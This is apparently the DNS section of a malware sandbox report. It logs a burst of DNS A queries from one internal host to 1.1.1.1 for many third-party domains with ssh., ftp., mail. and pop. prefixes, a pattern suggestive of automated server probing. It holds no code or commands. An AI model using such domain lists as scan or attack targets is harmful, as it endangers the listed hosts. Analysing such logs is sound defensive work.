Dec 22, 2023 21:14:55.968811989 CET	192.168.2.4	1.1.1.1	0xe6f6	Standard query (0)	ssh.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:55.973476887 CET	192.168.2.4	1.1.1.1	0xda55	Standard query (0)	dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.016890049 CET	192.168.2.4	1.1.1.1	0x2809	Standard query (0)	mail.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.037684917 CET	192.168.2.4	1.1.1.1	0xe01b	Standard query (0)	excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.081516981 CET	192.168.2.4	1.1.1.1	0x4b62	Standard query (0)	154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.081516981 CET	192.168.2.4	1.1.1.1	0x297c	Standard query (0)	ssh.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.081677914 CET	192.168.2.4	1.1.1.1	0x432f	Standard query (0)	ssh.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.081677914 CET	192.168.2.4	1.1.1.1	0x7fd6	Standard query (0)	cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.095458984 CET	192.168.2.4	1.1.1.1	0x1ec6	Standard query (0)	ssh.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.096191883 CET	192.168.2.4	1.1.1.1	0xc6af	Standard query (0)	nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.097729921 CET	192.168.2.4	1.1.1.1	0xb920	Standard query (0)	earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.115983009 CET	192.168.2.4	1.1.1.1	0xcf67	Standard query (0)	smartiebritches-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.123706102 CET	192.168.2.4	1.1.1.1	0xb82	Standard query (0)	hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.123723030 CET	192.168.2.4	1.1.1.1	0xd1e7	Standard query (0)	ssh.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.169042110 CET	192.168.2.4	1.1.1.1	0x6b4b	Standard query (0)	mailgate.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.169363022 CET	192.168.2.4	1.1.1.1	0x6b2e	Standard query (0)	gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.170793056 CET	192.168.2.4	1.1.1.1	0x3c5f	Standard query (0)	mailgate.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.172271967 CET	192.168.2.4	1.1.1.1	0x1316	Standard query (0)	mail.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.172544956 CET	192.168.2.4	1.1.1.1	0xa6a7	Standard query (0)	daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.206521034 CET	192.168.2.4	1.1.1.1	0xfa7e	Standard query (0)	firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.207495928 CET	192.168.2.4	1.1.1.1	0xe01b	Standard query (0)	excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.208026886 CET	192.168.2.4	1.1.1.1	0xcf53	Standard query (0)	dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.208944082 CET	192.168.2.4	1.1.1.1	0xae93	Standard query (0)	ssh.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.209306955 CET	192.168.2.4	1.1.1.1	0xb3a8	Standard query (0)	ftp.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.217525959 CET	192.168.2.4	1.1.1.1	0xe0bb	Standard query (0)	ssh.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.217842102 CET	192.168.2.4	1.1.1.1	0xcee3	Standard query (0)	ftp.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.219136000 CET	192.168.2.4	1.1.1.1	0x4349	Standard query (0)	ssh.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.219494104 CET	192.168.2.4	1.1.1.1	0xefb5	Standard query (0)	demarillac.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.220077038 CET	192.168.2.4	1.1.1.1	0x4ef	Standard query (0)	mail.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.220277071 CET	192.168.2.4	1.1.1.1	0x509f	Standard query (0)	ssh.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.221353054 CET	192.168.2.4	1.1.1.1	0x53c5	Standard query (0)	ssh.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.225428104 CET	192.168.2.4	1.1.1.1	0x46f8	Standard query (0)	ftp.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.227475882 CET	192.168.2.4	1.1.1.1	0x7102	Standard query (0)	ssh.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.227971077 CET	192.168.2.4	1.1.1.1	0xd9ec	Standard query (0)	ssh.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.241000891 CET	192.168.2.4	1.1.1.1	0x55b6	Standard query (0)	ssh.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.243366957 CET	192.168.2.4	1.1.1.1	0x6ad0	Standard query (0)	gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.246102095 CET	192.168.2.4	1.1.1.1	0xe8e6	Standard query (0)	ssh.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.275804996 CET	192.168.2.4	1.1.1.1	0xc6af	Standard query (0)	nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.275880098 CET	192.168.2.4	1.1.1.1	0xcf67	Standard query (0)	smartiebritches-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.316627026 CET	192.168.2.4	1.1.1.1	0x4f6b	Standard query (0)	integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.316931009 CET	192.168.2.4	1.1.1.1	0x2a8e	Standard query (0)	asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.318532944 CET	192.168.2.4	1.1.1.1	0xf916	Standard query (0)	necalin.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.319247961 CET	192.168.2.4	1.1.1.1	0x7f6b	Standard query (0)	sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.332712889 CET	192.168.2.4	1.1.1.1	0x3c5f	Standard query (0)	mailgate.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.407491922 CET	192.168.2.4	1.1.1.1	0xb3a8	Standard query (0)	ftp.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.407568932 CET	192.168.2.4	1.1.1.1	0x46f8	Standard query (0)	ftp.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.407568932 CET	192.168.2.4	1.1.1.1	0xefb5	Standard query (0)	demarillac.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.407618999 CET	192.168.2.4	1.1.1.1	0xd9ec	Standard query (0)	ssh.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.407618999 CET	192.168.2.4	1.1.1.1	0x55b6	Standard query (0)	ssh.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.407644987 CET	192.168.2.4	1.1.1.1	0x6ad0	Standard query (0)	gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.474363089 CET	192.168.2.4	1.1.1.1	0x7f6b	Standard query (0)	sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.474440098 CET	192.168.2.4	1.1.1.1	0xf916	Standard query (0)	necalin.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.475136042 CET	192.168.2.4	1.1.1.1	0x4f6b	Standard query (0)	integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.924716949 CET	192.168.2.4	1.1.1.1	0x10d9	Standard query (0)	caribbean360-com.p30.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.927326918 CET	192.168.2.4	1.1.1.1	0xb44f	Standard query (0)	mail.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.931119919 CET	192.168.2.4	1.1.1.1	0x217b	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:56.969136000 CET	192.168.2.4	1.1.1.1	0x36d5	Standard query (0)	www.flandria-loisirs.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.003365040 CET	192.168.2.4	1.1.1.1	0xc85	Standard query (0)	mail.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.021174908 CET	192.168.2.4	1.1.1.1	0x6d64	Standard query (0)	mail.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.021667004 CET	192.168.2.4	1.1.1.1	0x71c3	Standard query (0)	ssh.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.061328888 CET	192.168.2.4	1.1.1.1	0xeae8	Standard query (0)	pop.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.077059984 CET	192.168.2.4	1.1.1.1	0xa0dc	Standard query (0)	mail.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.090809107 CET	192.168.2.4	1.1.1.1	0x10d9	Standard query (0)	caribbean360-com.p30.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.092128992 CET	192.168.2.4	1.1.1.1	0xced7	Standard query (0)	mail.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.111808062 CET	192.168.2.4	1.1.1.1	0x3302	Standard query (0)	caribbean360-com.p40.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.123640060 CET	192.168.2.4	1.1.1.1	0x36d5	Standard query (0)	www.flandria-loisirs.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.124825954 CET	192.168.2.4	1.1.1.1	0x5bdb	Standard query (0)	distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.138489008 CET	192.168.2.4	1.1.1.1	0xb1fe	Standard query (0)	ssh.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.138920069 CET	192.168.2.4	1.1.1.1	0x2855	Standard query (0)	ssh.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.139348030 CET	192.168.2.4	1.1.1.1	0x756c	Standard query (0)	ssh.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.160949945 CET	192.168.2.4	1.1.1.1	0xc85	Standard query (0)	mail.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.168019056 CET	192.168.2.4	1.1.1.1	0x71c3	Standard query (0)	ssh.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.191148043 CET	192.168.2.4	1.1.1.1	0x763a	Standard query (0)	www.wika.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.191148996 CET	192.168.2.4	1.1.1.1	0x4e4b	Standard query (0)	ssh.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.193490028 CET	192.168.2.4	1.1.1.1	0x478e	Standard query (0)	mail.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.229235888 CET	192.168.2.4	1.1.1.1	0xa0dc	Standard query (0)	mail.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.231729031 CET	192.168.2.4	1.1.1.1	0xbfe3	Standard query (0)	ssh.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.265933990 CET	192.168.2.4	1.1.1.1	0xced7	Standard query (0)	mail.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.266021967 CET	192.168.2.4	1.1.1.1	0x3302	Standard query (0)	caribbean360-com.p40.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.279556990 CET	192.168.2.4	1.1.1.1	0x5bdb	Standard query (0)	distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.280296087 CET	192.168.2.4	1.1.1.1	0x1ed9	Standard query (0)	ssh.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.282008886 CET	192.168.2.4	1.1.1.1	0xed3b	Standard query (0)	pop3.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.317509890 CET	192.168.2.4	1.1.1.1	0x2855	Standard query (0)	ssh.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.317622900 CET	192.168.2.4	1.1.1.1	0xb1fe	Standard query (0)	ssh.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.338469982 CET	192.168.2.4	1.1.1.1	0x6deb	Standard query (0)	smtp.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.339476109 CET	192.168.2.4	1.1.1.1	0x478e	Standard query (0)	mail.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.339476109 CET	192.168.2.4	1.1.1.1	0x4e4b	Standard query (0)	ssh.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.345313072 CET	192.168.2.4	1.1.1.1	0xf900	Standard query (0)	relay.maroonshockey.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.387384892 CET	192.168.2.4	1.1.1.1	0x6c1a	Standard query (0)	mail.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.487992048 CET	192.168.2.4	1.1.1.1	0xb3a8	Standard query (0)	ftp.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.488079071 CET	192.168.2.4	1.1.1.1	0xed3b	Standard query (0)	pop3.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.499736071 CET	192.168.2.4	1.1.1.1	0x6deb	Standard query (0)	smtp.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.577034950 CET	192.168.2.4	1.1.1.1	0x6c1a	Standard query (0)	mail.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.580982924 CET	192.168.2.4	1.1.1.1	0x8fd4	Standard query (0)	ssh.necalin.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.580982924 CET	192.168.2.4	1.1.1.1	0x51f7	Standard query (0)	ssh.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.634216070 CET	192.168.2.4	1.1.1.1	0xce11	Standard query (0)	ssh.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:57.673249960 CET	192.168.2.4	1.1.1.1	0x14b5	Standard query (0)	ssh.demarillac.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.239320993 CET	192.168.2.4	1.1.1.1	0x26e6	Standard query (0)	ssh.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.657690048 CET	192.168.2.4	1.1.1.1	0x5bdb	Standard query (0)	distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.657690048 CET	192.168.2.4	1.1.1.1	0x26e6	Standard query (0)	ssh.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.658255100 CET	192.168.2.4	1.1.1.1	0x6c1a	Standard query (0)	mail.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.714855909 CET	192.168.2.4	1.1.1.1	0xcaaf	Standard query (0)	ftp.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.750123978 CET	192.168.2.4	1.1.1.1	0xa0af	Standard query (0)	mail.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.753667116 CET	192.168.2.4	1.1.1.1	0x17	Standard query (0)	ftp.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.754467010 CET	192.168.2.4	1.1.1.1	0x5713	Standard query (0)	ftp.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.754833937 CET	192.168.2.4	1.1.1.1	0x8b82	Standard query (0)	ftp.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.754833937 CET	192.168.2.4	1.1.1.1	0x7255	Standard query (0)	ftp.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.755121946 CET	192.168.2.4	1.1.1.1	0xd5e7	Standard query (0)	mail.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.758178949 CET	192.168.2.4	1.1.1.1	0x72b7	Standard query (0)	ftp.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.758510113 CET	192.168.2.4	1.1.1.1	0xd986	Standard query (0)	mail.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.759697914 CET	192.168.2.4	1.1.1.1	0x467	Standard query (0)	mail.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.759974957 CET	192.168.2.4	1.1.1.1	0x5ad	Standard query (0)	ftp.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.759974957 CET	192.168.2.4	1.1.1.1	0x9270	Standard query (0)	ftp.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.760215998 CET	192.168.2.4	1.1.1.1	0x7ccd	Standard query (0)	ftp.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.760215998 CET	192.168.2.4	1.1.1.1	0x74c3	Standard query (0)	ssh.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.771312952 CET	192.168.2.4	1.1.1.1	0x985a	Standard query (0)	pop.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.776973963 CET	192.168.2.4	1.1.1.1	0xacca	Standard query (0)	mail.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.787632942 CET	192.168.2.4	1.1.1.1	0x35c7	Standard query (0)	ftp.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.787870884 CET	192.168.2.4	1.1.1.1	0x13ec	Standard query (0)	ftp.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.790725946 CET	192.168.2.4	1.1.1.1	0xc541	Standard query (0)	mail.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.793068886 CET	192.168.2.4	1.1.1.1	0x9c55	Standard query (0)	ftp.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.793068886 CET	192.168.2.4	1.1.1.1	0x6b84	Standard query (0)	ftp.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.796009064 CET	192.168.2.4	1.1.1.1	0x390e	Standard query (0)	mail.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.797127962 CET	192.168.2.4	1.1.1.1	0x3161	Standard query (0)	ftp.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.797445059 CET	192.168.2.4	1.1.1.1	0xc2c6	Standard query (0)	ftp.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.806874990 CET	192.168.2.4	1.1.1.1	0x7515	Standard query (0)	relay.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.807379961 CET	192.168.2.4	1.1.1.1	0x6ca8	Standard query (0)	mail.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.807742119 CET	192.168.2.4	1.1.1.1	0x2e19	Standard query (0)	ssh.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.808010101 CET	192.168.2.4	1.1.1.1	0x291b	Standard query (0)	ssh.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.808191061 CET	192.168.2.4	1.1.1.1	0xac14	Standard query (0)	mail.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.808433056 CET	192.168.2.4	1.1.1.1	0x7b79	Standard query (0)	ftp.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.808726072 CET	192.168.2.4	1.1.1.1	0x495	Standard query (0)	mail.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.809045076 CET	192.168.2.4	1.1.1.1	0x7caf	Standard query (0)	mail.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.809267044 CET	192.168.2.4	1.1.1.1	0x7330	Standard query (0)	mail.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.809482098 CET	192.168.2.4	1.1.1.1	0x425f	Standard query (0)	mail.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.824394941 CET	192.168.2.4	1.1.1.1	0xb20	Standard query (0)	mail.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.825066090 CET	192.168.2.4	1.1.1.1	0x371b	Standard query (0)	ssh.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.825730085 CET	192.168.2.4	1.1.1.1	0x4d6e	Standard query (0)	mail.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.825730085 CET	192.168.2.4	1.1.1.1	0x2d34	Standard query (0)	mail.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.825980902 CET	192.168.2.4	1.1.1.1	0x9350	Standard query (0)	mail.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.826432943 CET	192.168.2.4	1.1.1.1	0x996b	Standard query (0)	mail.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.827246904 CET	192.168.2.4	1.1.1.1	0xa4eb	Standard query (0)	mail.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.830887079 CET	192.168.2.4	1.1.1.1	0xd67f	Standard query (0)	mail.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.831290007 CET	192.168.2.4	1.1.1.1	0x5ac8	Standard query (0)	mail.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.846612930 CET	192.168.2.4	1.1.1.1	0xd96	Standard query (0)	mail.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.846827030 CET	192.168.2.4	1.1.1.1	0x252f	Standard query (0)	mail.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.847249031 CET	192.168.2.4	1.1.1.1	0x79ee	Standard query (0)	ssh.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.847358942 CET	192.168.2.4	1.1.1.1	0xc6e7	Standard query (0)	ssh.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.847656965 CET	192.168.2.4	1.1.1.1	0xca9f	Standard query (0)	mail.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.849409103 CET	192.168.2.4	1.1.1.1	0xbf38	Standard query (0)	mail.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.849592924 CET	192.168.2.4	1.1.1.1	0x990a	Standard query (0)	imap.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.852840900 CET	192.168.2.4	1.1.1.1	0x6443	Standard query (0)	pop.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.864691019 CET	192.168.2.4	1.1.1.1	0xfff5	Standard query (0)	mail.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.864969969 CET	192.168.2.4	1.1.1.1	0x2c7d	Standard query (0)	mail.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.865406036 CET	192.168.2.4	1.1.1.1	0xdd05	Standard query (0)	mail.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.865993023 CET	192.168.2.4	1.1.1.1	0x740c	Standard query (0)	pop.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.921617031 CET	192.168.2.4	1.1.1.1	0x126c	Standard query (0)	mail.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.925529003 CET	192.168.2.4	1.1.1.1	0x17	Standard query (0)	ftp.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.925544977 CET	192.168.2.4	1.1.1.1	0xa0af	Standard query (0)	mail.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.925544977 CET	192.168.2.4	1.1.1.1	0x9270	Standard query (0)	ftp.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.925844908 CET	192.168.2.4	1.1.1.1	0x7ccd	Standard query (0)	ftp.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.925844908 CET	192.168.2.4	1.1.1.1	0x74c3	Standard query (0)	ssh.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.927033901 CET	192.168.2.4	1.1.1.1	0x9c74	Standard query (0)	mail.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.927622080 CET	192.168.2.4	1.1.1.1	0x174f	Standard query (0)	pop.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.928092957 CET	192.168.2.4	1.1.1.1	0xfaf2	Standard query (0)	mail.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973655939 CET	192.168.2.4	1.1.1.1	0x35c7	Standard query (0)	ftp.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973716974 CET	192.168.2.4	1.1.1.1	0xacca	Standard query (0)	mail.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973747015 CET	192.168.2.4	1.1.1.1	0x13ec	Standard query (0)	ftp.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973747015 CET	192.168.2.4	1.1.1.1	0x6b84	Standard query (0)	ftp.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973759890 CET	192.168.2.4	1.1.1.1	0xc541	Standard query (0)	mail.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973861933 CET	192.168.2.4	1.1.1.1	0x425f	Standard query (0)	mail.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973903894 CET	192.168.2.4	1.1.1.1	0x495	Standard query (0)	mail.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973903894 CET	192.168.2.4	1.1.1.1	0x7330	Standard query (0)	mail.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973922014 CET	192.168.2.4	1.1.1.1	0x7b79	Standard query (0)	ftp.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973961115 CET	192.168.2.4	1.1.1.1	0xac14	Standard query (0)	mail.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973975897 CET	192.168.2.4	1.1.1.1	0x7515	Standard query (0)	relay.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:58.973975897 CET	192.168.2.4	1.1.1.1	0x6ca8	Standard query (0)	mail.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.018105030 CET	192.168.2.4	1.1.1.1	0x996b	Standard query (0)	mail.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:59.018136978 CET	192.168.2.4	1.1.1.1	0xca9f	Standard query (0)	mail.pkmanagment.com	A (IP address)	IN (0x0001)	false
